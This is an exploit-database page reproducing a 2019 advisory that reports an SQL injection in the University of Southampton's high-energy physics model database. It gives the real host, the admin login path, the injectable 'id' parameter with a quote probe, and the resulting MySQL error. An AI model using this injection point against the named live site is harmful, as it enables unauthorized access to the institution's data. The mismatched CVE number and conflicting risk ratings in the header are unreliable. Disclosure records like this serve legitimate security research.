Advertisement






Phenodata University of Southampton High Energy Physics Database SQL Injection

CVE Category Price Severity
CVE-2021-32699 CWE-89 $5,000 High
Author Risk Exploitation Type Date
Cybersecurity Team High Remote 2019-08-23
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080117

Below is a copy:

Phenodata University of Southampton High Energy Physics Database SQL Injection
###################################################################

# Exploit Title : Phenodata University of Southampton High Energy Physics Database SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 23/08/2019
# Vendor Homepage : hepmdb.soton.ac.uk
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During 
Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Phenodata University of Southampton High Energy Physics Database is prone to an SQL-injection 
vulnerability because it fails to sufficiently sanitize user-supplied data before using 
it in an SQL query. Exploiting this issue could allow an attacker to compromise the 
application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# Admin Panel Login Path :
************************
/index.php?mod=user&act=login

# SQL Injection Exploit :
**********************
/index.php?mod=user&act=showmodel&id=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
[+] hepmdb.soton.ac.uk/index.php?mod=user&act=showmodel&id=1%27

###################################################################

# Example SQL Database Error :
****************************
Error You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1 
in query SELECT * FROM model WHERE id=1\' LIMIT 1. 

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.